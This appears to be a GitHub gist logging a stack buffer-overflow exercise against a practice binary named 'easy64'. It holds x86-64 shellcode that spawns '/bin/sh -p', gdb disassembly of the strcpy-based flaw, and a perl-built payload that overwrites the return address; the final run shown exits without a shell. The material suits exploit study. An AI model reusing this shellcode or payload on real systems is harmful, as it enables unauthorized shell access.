Created
June 11, 2018 15:40
-
-
Save fgsahoward/96cc530ab5c882bacab82922b801ff38 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [howard@sterling shellcodes]$ cat shell3_64.sc | |
| \x48\x31\xff\x57\xeb\x34\x4c\x8b\x04\x24\x4d\x31\xc9\x41\xb1\x41\x45\x30\x48\x07\x4c\x89\xc7\x4c\x8b\x44\x24\x08\x4d\x31\x48\x02\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xd4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41 | |
| [howard@sterling shellcodes]$ cat shell3_64.sc | wc -c | |
| 265 | |
| [howard@sterling shellcodes]$ gdb -q ../easy64 | |
| Reading symbols from ../easy64...(no debugging symbols found)...done. | |
| (gdb) disas main | |
| Dump of assembler code for function main: | |
| 0x00000000004005bd <+0>: push %rbp | |
| 0x00000000004005be <+1>: mov %rsp,%rbp | |
| 0x00000000004005c1 <+4>: sub $0x10,%rsp | |
| 0x00000000004005c5 <+8>: mov %edi,-0x4(%rbp) | |
| 0x00000000004005c8 <+11>: mov %rsi,-0x10(%rbp) | |
| 0x00000000004005cc <+15>: cmpl $0x2,-0x4(%rbp) | |
| 0x00000000004005d0 <+19>: je 0x4005dc <main+31> | |
| 0x00000000004005d2 <+21>: mov $0x1,%edi | |
| 0x00000000004005d7 <+26>: callq 0x400460 <exit@plt> | |
| 0x00000000004005dc <+31>: mov -0x10(%rbp),%rax | |
| 0x00000000004005e0 <+35>: add $0x8,%rax | |
| 0x00000000004005e4 <+39>: mov (%rax),%rax | |
| 0x00000000004005e7 <+42>: mov %rax,%rdi | |
| 0x00000000004005ea <+45>: callq 0x400576 <vulnerable> | |
| 0x00000000004005ef <+50>: mov $0x0,%eax | |
| 0x00000000004005f4 <+55>: leaveq | |
| 0x00000000004005f5 <+56>: retq | |
| End of assembler dump. | |
| (gdb) disas vulnerable | |
| Dump of assembler code for function vulnerable: | |
| 0x0000000000400576 <+0>: push %rbp | |
| 0x0000000000400577 <+1>: mov %rsp,%rbp | |
| 0x000000000040057a <+4>: sub $0x410,%rsp | |
| 0x0000000000400581 <+11>: mov %rdi,-0x408(%rbp) | |
| 0x0000000000400588 <+18>: mov -0x408(%rbp),%rdx | |
| 0x000000000040058f <+25>: lea -0x400(%rbp),%rax | |
| 0x0000000000400596 <+32>: mov %rdx,%rsi | |
| 0x0000000000400599 <+35>: mov %rax,%rdi | |
| 0x000000000040059c <+38>: callq 0x400430 <strcpy@plt> | |
| 0x00000000004005a1 <+43>: lea -0x400(%rbp),%rax | |
| 0x00000000004005a8 <+50>: mov %rax,%rsi | |
| 0x00000000004005ab <+53>: mov $0x400684,%edi | |
| 0x00000000004005b0 <+58>: mov $0x0,%eax | |
| 0x00000000004005b5 <+63>: callq 0x400440 <printf@plt> | |
| 0x00000000004005ba <+68>: nop | |
| 0x00000000004005bb <+69>: leaveq | |
| 0x00000000004005bc <+70>: retq | |
| End of assembler dump. | |
| (gdb) b *vulnerable+38 | |
| (gdb) r `perl -e 'print "A"x0x408, "B"x6'` | |
| The program being debugged has been started already. | |
| Start it from the beginning? (y or n) y | |
| Starting program: /home/howard/repos/bof/easy64 `perl -e 'print "A"x0x408, "B"x6'` | |
| Breakpoint 1, 0x000000000040059c in vulnerable () | |
| (gdb) i r | |
| rax 0x7fffffffe020 140737488347168 | |
| rbx 0x0 0 | |
| rcx 0x0 0 | |
| rdx 0x7fffffffe7e8 140737488349160 | |
| rsi 0x7fffffffe7e8 140737488349160 | |
| rdi 0x7fffffffe020 140737488347168 | |
| rbp 0x7fffffffe420 0x7fffffffe420 | |
| rsp 0x7fffffffe010 0x7fffffffe010 | |
| r8 0x400670 4195952 | |
| r9 0x7ffff7de88b0 140737351944368 | |
| r10 0x846 2118 | |
| r11 0x7ffff7a58650 140737348208208 | |
| r12 0x400480 4195456 | |
| r13 0x7fffffffe520 140737488348448 | |
| r14 0x0 0 | |
| r15 0x0 0 | |
| rip 0x40059c 0x40059c <vulnerable+38> | |
| eflags 0x202 [ IF ] | |
| cs 0x33 51 | |
| ss 0x2b 43 | |
| ds 0x0 0 | |
| es 0x0 0 | |
| fs 0x0 0 | |
| gs 0x0 0 | |
| (gdb) c | |
| Continuing. | |
| Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB | |
| Program received signal SIGSEGV, Segmentation fault. | |
| 0x0000424242424242 in ?? () | |
| (gdb) r `perl -e 'print "\x48\x31\xff\x57\xeb\x34\x4c\x8b\x04\x24\x4d\x31\xc9\x41\xb1\x41\x45\x30\x48\x07\x4c\x89\xc7\x4c\x8b\x44\x24\x08\x4d\x31\x48\x02\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xd4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3c6, "\x20\xe0\xff\xff\xff\x7f"'` | |
| Starting program: /home/howard/repos/bof/easy64 `perl -e 'print "\x48\x31\xff\x57\xeb\x34\x4c\x8b\x04\x24\x4d\x31\xc9\x41\xb1\x41\x45\x30\x48\x07\x4c\x89\xc7\x4c\x8b\x44\x24\x08\x4d\x31\x48\x02\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xd4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\xe8\xee\xff\xff\xff\x2d\x70\x41", "A"x0x3c6, "\x20\xe0\xff\xff\xff\x7f"'` | |
| [Inferior 1 (process 3688) exited with code 01] | |
| (gdb) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment